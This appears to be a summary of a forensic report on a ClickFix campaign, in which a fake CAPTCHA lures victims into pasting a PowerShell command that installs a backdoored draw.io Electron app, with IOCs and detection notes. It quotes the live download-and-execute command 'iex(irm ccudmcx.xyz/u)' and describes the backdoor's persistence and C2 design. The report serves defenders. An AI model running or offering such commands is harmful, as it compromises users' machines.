DFIRForensic report May 2026
The victim opened a fake CAPTCHA page, pasted the PowerShell command the page asked for, and from that point the host was compromised. The final payload is a modified draw.io Electron app: it looks like the legitimate diagram tool but ships a JavaScript backdoor injected into app.asar. On launch the backdoor does three things: registers itself for auto-start via setLoginItemSettings, beacons every 65 seconds to chimefusion.com over HTTPS, and accepts two kinds of orders — arbitrary JS eval or write-and-execute of base64 binaries received from the C2.
The operator did not write a custom Electron app. They took the legitimate draw.io v19.0.3 source and prepended ~70 lines of JavaScript at the top of the entry file. Those lines start a while(true) beacon loop, and because the loop never returns, draw.io's own initialization code that comes after never runs. The user-visible consequence is counterintuitive: the victim launches "draw.io" and sees no window. The process appears in Task Manager but with no UI. They likely think the app crashed, close the non-existent window, and forget about it. Meanwhile the RAT is already running and registered for auto-start.
www.fepafut.com (compromised legitimate site)iex(irm ccudmcx.xyz/u) pasted via Win+Rccudmcx.xyz/update.zip (~110 MB, drawio bundle)%LOCALAPPDATA%\UpdateApp\ + Run key registrychimefusion.com, beacon every 65 s, JSON over HTTPSwww.fepafut.com — compromised legitimate site serving the lureccudmcx.xyz — operator-controlled NRD; serves /u and /update.zipchimefusion.com — C2 endpoint receiving 65 s JSON beacon%LOCALAPPDATA%\UpdateApp\draw.io.exe%APPDATA%\setup.txt%LOCALAPPDATA%\Microsoft\Cache\demo.logHKCU\Software\Microsoft\Windows\CurrentVersion\Run\draw.ioThis section documents — from the investigation's standpoint — what telemetry, artifacts, and controls would be relevant against a chain like this one. It is not a remediation guide nor an operational recommendation. Each organization applies its own judgment based on threat model, infrastructure, and policy.
Three artifact families distinguish a compromised host: network pivots (the three domains above), filesystem pivots (the three paths above), and the Run registry key for persistence. Detection content includes Suricata rules on HTTP host + URI + UA, KQL queries combining iex(irm + domain markers, and behavioral EDR rules for Electron processes calling setLoginItemSettings from outside Program Files.
The full report covers the complete kill chain, MITRE ATT&CK mapping, Diamond Model attribution, PCAP analysis (including QUIC observations), full IOC tables, and detection rules in Suricata, KQL/Sentinel and Sigma format.
Microsoft — Think Before You ClickFix: Analyzing the ClickFix Social Engineering Technique
Intego — OSX/Amos: Hunting C2s in Trojanized Electron ASAR Payloads
Huntress — ClickFix Gets Creative: Malware Buried in Images
→ Read the full Spanish report for the complete investigation, charts, IOC tables, and detection rules.